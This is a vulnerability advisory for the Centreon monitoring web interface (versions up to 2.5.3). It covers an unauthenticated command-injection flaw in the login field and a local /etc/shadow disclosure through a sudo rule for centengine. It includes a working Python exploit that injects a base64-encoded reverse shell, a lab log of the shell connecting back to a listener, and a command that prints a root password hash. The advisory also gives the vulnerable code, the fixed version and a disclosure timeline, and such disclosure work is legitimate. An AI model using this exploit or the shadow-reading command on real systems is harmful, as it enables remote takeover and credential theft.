179 lines
No EOL
4.8 KiB
Text
179 lines
No EOL
4.8 KiB
Text
Unauthenticated Remote Command Execution in Centreon Web Interface
|
|
==================================================================
|
|
|
|
|
|
Description
|
|
===========
|
|
|
|
Centreon is a popular monitoring solution.
|
|
|
|
A critical vulnerability has been found in the Centreon logging class
|
|
allowing remote users to execute arbitrary commands.
|
|
|
|
|
|
SQL injection leading to RCE
|
|
============================
|
|
|
|
Centreon logs SQL database errors in a log file using the "echo" system
|
|
command and the exec() PHP function. On the authentification class,
|
|
Centreon use htmlentities with the ENT_QUOTES options to filter SQL
|
|
entities.
|
|
However, Centreon doesn't filter the SQL escape character "\" and it is
|
|
possible to generate an SQL Error.
|
|
Because of the use of the "echo" system command with the PHP exec()
|
|
function, and because of the lack of sanitization, it is possible to
|
|
inject arbitrary system commands.
|
|
|
|
**Access Vector**: remote
|
|
|
|
**Security Risk**: high
|
|
|
|
**Vulnerability**: CWE-78
|
|
|
|
----------------
|
|
Proof of Concept
|
|
----------------
|
|
|
|
TCP Reverse Shell using python.
|
|
|
|
#!/usr/bin/env python
|
|
import requests
|
|
import argparse
|
|
|
|
def shell(target, reverseip, reverseport):
|
|
payload = 'import socket as a,subprocess as b,os as
|
|
c;s=a.socket(2,1);s.connect(("%s",%d));d=s.fileno();c.dup2(d,0);c.dup2(d,1);c.dup2(d,2);p=b.call(["sh"]);'
|
|
% (reverseip,reverseport)
|
|
print "[~] Starting reverseshell : %s - port : %d" % (reverseip,
|
|
reverseport)
|
|
req = requests.post(target, data={"useralias": "$(echo %s |
|
|
base64 -d | python)\\" % payload.encode("base64").replace("\n",""),
|
|
"password": "foo"})
|
|
print "[+] DEAD !"
|
|
|
|
if __name__ == "__main__":
|
|
print "[~] Centreon Unauthentificated RCE - Nicolas Chatelain
|
|
<n.chatelain@sysdream.com>"
|
|
parser = argparse.ArgumentParser()
|
|
parser.add_argument("--target", required=True)
|
|
parser.add_argument("--reverseip", required=True)
|
|
parser.add_argument("--reverseport", required=True, type=int)
|
|
args = parser.parse_args()
|
|
shell(args.target, args.reverseip, args.reverseport)
|
|
|
|
Shell :
|
|
|
|
nightlydev@nworkstation ~/Lab/Centreon $ python reverseshell.py
|
|
--target=http://172.16.138.137/centreon/index.php
|
|
--reverseip=172.16.138.1 --reverseport 8888
|
|
[~] Centreon Unauthentificated RCE - Nicolas Chatelain
|
|
<n.chatelain@sysdream.com>
|
|
[~] Starting reverseshell : 172.16.138.1 - port : 8888
|
|
|
|
# Other term
|
|
|
|
nightlydev@nworkstation ~/Lab/Centreon $ nc -lvp 8888
|
|
Ncat: Version 6.45 ( http://nmap.org/ncat )
|
|
Ncat: Listening on :::8888
|
|
Ncat: Listening on 0.0.0.0:8888
|
|
Ncat: Connection from 172.16.138.135.
|
|
Ncat: Connection from 172.16.138.135:50050.
|
|
whoami
|
|
apache
|
|
groups
|
|
apache centreon-engine centreon-broker centreon nagios
|
|
|
|
|
|
---------------
|
|
Vulnerable code
|
|
---------------
|
|
|
|
The vulnerable code is located in class/centreonLog.class.php, line 82
|
|
and line 154:
|
|
|
|
|
|
/*
|
|
* print Error in log file.
|
|
*/
|
|
exec("echo \"".$string."\" >> ".$this->errorType[$id]);
|
|
|
|
In class/centreonAuth.class.php, line 227:
|
|
|
|
$DBRESULT = $this->pearDB->query("SELECT * FROM `contact` WHERE
|
|
`contact_alias` = '" . htmlentities($username, ENT_QUOTES, "UTF-8") . "'
|
|
AND `contact_activate` = '1' AND `contact_register` = '1' LIMIT 1");
|
|
|
|
|
|
--------
|
|
Solution
|
|
--------
|
|
|
|
Update to the Centreon 2.5.4
|
|
|
|
|
|
Possible root password disclosure in centengine (Centreon Entreprise Server)
|
|
============================================================================
|
|
|
|
In some configurations, when centengine can run as root (with sudo).
|
|
It's possible to read some file content.
|
|
|
|
**Access Vector**: local
|
|
|
|
**Security Risk**: high
|
|
|
|
**Vulnerability**: CWE-209
|
|
|
|
----------------
|
|
Proof of Concept
|
|
----------------
|
|
|
|
$ sudo /usr/sbin/centengine -v /etc/shadow
|
|
[1416391088] reading main config file
|
|
[1416391088] error while processing a config file: [/etc/shadow:1]
|
|
bad variable name:
|
|
'root:$6$3mvvEHQM3p3afuh4$DZ377daOy.8bn42t7ur82/Geplvsj90J7cs1xsgAbRZ0JDZ8KdB5CcQ0ucF5dwKpnBYLon1XBqjJPqpm6Zr5R0:16392:0:99999:7:::'
|
|
[1416391088]
|
|
|
|
---------------
|
|
Vulnerable code
|
|
---------------
|
|
|
|
In Centreon Entreprise Server (CES) : /etc/sudoers.d/centreon
|
|
|
|
CENTREON ALL = NOPASSWD: /usr/sbin/centengine -v *
|
|
|
|
--------
|
|
Solution
|
|
--------
|
|
|
|
Do not allow centengine to be run as root or do not disclose the line
|
|
that caused the error.
|
|
|
|
Timeline (dd/mm/yyyy)
|
|
=====================
|
|
|
|
* 18/11/2014 : Initial discovery
|
|
* 26/11/2014 : Contact with Centreon team
|
|
* 27/11/2014 : Centreon correct vulnerabilities
|
|
* 27/11/2014 : Centreon release version 2.5.4 that fixes vulnerabilities
|
|
|
|
Fixes
|
|
=====
|
|
|
|
*
|
|
https://github.com/centreon/centreon/commit/a6dd914418dd185a698050349e05f10438fde2a9
|
|
*
|
|
https://github.com/centreon/centreon/commit/d00f3e015d6cf64e45822629b00068116e90ae4d
|
|
*
|
|
https://github.com/centreon/centreon/commit/015e875482d7ff6016edcca27bffe765c2bd77c1
|
|
|
|
Affected versions
|
|
=================
|
|
|
|
* Centreon <= 2.5.3
|
|
|
|
|
|
Credits
|
|
=======
|
|
|
|
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com) |